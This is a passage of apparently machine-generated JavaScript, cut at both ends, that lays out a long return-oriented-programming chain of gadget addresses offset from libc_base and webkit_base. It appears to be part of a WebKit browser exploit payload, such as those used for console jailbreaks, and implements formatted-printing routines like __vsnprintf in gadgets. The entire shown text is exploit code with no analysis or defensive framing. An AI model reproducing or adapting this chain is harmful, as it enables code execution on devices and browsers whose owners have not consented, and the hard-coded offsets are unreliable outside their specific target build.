1 libc_base+763368 //pop rcx ]); //L6257: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6258: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6259: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608, //pop rax //L6261: ropchain+316976, //L6260 libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+782311, //pop rsp ropchain+211272, //__ntoa_format //L6260: libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967208, 4294967295]); // -0x58 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+317104, //L6262 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+317136, //L6264 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+317120, //L6263 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6262: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6263: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6264: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+317240, //L6265 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+317256, //L6266 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L6265: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6266: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi 
]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+317376, //L6267 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+317360, //L6268 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L6268: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L6267: db([0, 0]); // 0x0 set_gadgets([ libc_base+764760, //pop rsi ropchain+317464, //L6270 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+317448, //L6269 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L6269: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6270: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+317568, //L6271 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+317584, //L6272 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L6271: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6272: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+317704, //L6273 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+317688, //L6274 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L6274: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L6273: db([0, 0]); // 0x0 //__vsnprintf: set_gadget(libc_base+764760,); 
//pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+317776, //L6276 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L6276: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+317840, //L6278 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L6278: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([104, 0]); // 0x68 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+317928, //L6280 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6279: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L6280: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6281: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+318008, //L6282 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6282: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6284: db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L6286: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+318168, //L6289 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+318152, //L6287 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6287: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6289: db([0, 0]); 
// 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+318328, //L6293 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+318280, //L6290 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+318296, //L6291 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6290: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6291: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6292: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6293: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+318464, //L6295 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+318480, //L6296 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+318448, //L6294 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L6294: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6295: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6296: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+318592, //L6298 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+318640, //L6301 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+318608, //L6299 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L6298: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6299: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6300: db([0, 0]); // 0x0 
set_gadget(libc_base+759608,); //pop rax //L6301: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+318752, //L6302+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+318744, //L6302 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L6302: db([0, 0]); // 0x0 set_gadgets([ ropchain+318768, //L6302+24 ropchain+318872, //L6297 libc_base+731401, //mov rax, r8 libc_base+763368, //pop rcx //L6303: ropchain+165824, //__out_null libc_base+764760 //pop rsi ]); //L6305: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+318864, //L6306 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6306: db([0, 0]); // 0x0 //L6297: //L6308: set_gadgets([ libc_base+764760, //pop rsi ropchain+318912, //L6309 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6309: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6311: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+319032, //L6314 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+319016, //L6312 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6312: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6314: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+319112, //L6315 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+319128, 
//L6316 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L6315: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6316: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+319288, //L6320 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+319256, //L6318 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+319272, //L6319 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6317: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L6318: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6319: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6320: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+319344, //L6322 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L6322: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+319472, //L6324 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+319488, //L6325 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+319456, //L6323 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6323: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L6324: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6325: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+319648, //L6329 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+319616, //L6327 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+319632, //L6328 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6326: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L6327: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6328: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6329: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+319704, //L6331 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L6331: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+319832, //L6333 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+319848, //L6334 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+319816, //L6332 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6332: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L6333: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6334: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+320008, //L6338 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+319976, //L6336 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+319992, //L6337 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6335: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L6336: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6337: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6338: 
db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+320064, //L6340 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L6340: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+320192, //L6342 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+320208, //L6343 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+320176, //L6341 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6341: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L6342: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6343: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+320320, //L6345 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+320368, //L6348 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+320336, //L6346 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L6345: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6346: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6347: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6348: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+320480, //L6349+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+320472, //L6349 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp 
]); //L6349: db([0, 0]); // 0x0 set_gadgets([ ropchain+320496, //L6349+24 ropchain+548880, //L6344 libc_base+764760, //pop rsi ropchain+320536, //L6350 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6350: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6352: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+320656, //L6355 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+320640, //L6353 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6353: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6355: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+320736, //L6356 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+320752, //L6357 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L6356: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6357: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+320912, //L6361 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+320880, //L6359 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+320896, //L6360 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6358: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L6359: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6360: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6361: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi 
ropchain+320968, //L6363 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L6363: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+321096, //L6365 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+321112, //L6366 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+321080, //L6364 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6364: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L6365: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6366: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+321272, //L6370 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+321240, //L6368 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+321256, //L6369 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6367: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L6368: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6369: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6370: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+321328, //L6372 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L6372: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+321456, //L6374 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+321472, //L6375 webkit_base+660161, //mov [rsi], 
rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+321440, //L6373 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6373: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L6374: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6375: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+321632, //L6379 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+321600, //L6377 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+321616, //L6378 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6376: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L6377: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6378: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6379: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+321688, //L6381 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L6381: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+321816, //L6383 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+321832, //L6384 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+321800, //L6382 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6382: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L6383: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6384: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi 
ropchain+321912, //L6385 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+321928, //L6386 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L6385: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6386: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+322024, //L6388 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+322008, //L6387 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L6387: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6388: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+322104, //L6389 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L6389: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6390: db([37, 0]); // 0x25 set_gadget(libc_base+144605,); //pop rdi //L6391: db([37, 0]); // 0x25 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+322248, //L6392 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+322280, //L6394 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+322264, //L6393 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6392: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6393: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6394: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); 
// -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+322456, //L6396 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+322472, //L6397 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+322440, //L6395 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L6395: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6396: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6397: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+322584, //L6399 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+322632, //L6402 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+322600, //L6400 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L6399: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6400: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6401: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6402: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+322744, //L6403+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+322736, //L6403 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L6403: db([0, 0]); // 0x0 set_gadgets([ ropchain+322760, //L6403+24 ropchain+326648, //L6398 libc_base+764760, //pop rsi 
ropchain+322800, //L6404 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6404: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6406: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+322920, //L6409 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+322904, //L6407 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6407: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6409: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+323064, //L6412 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+323032, //L6410 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+323048, //L6411 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx 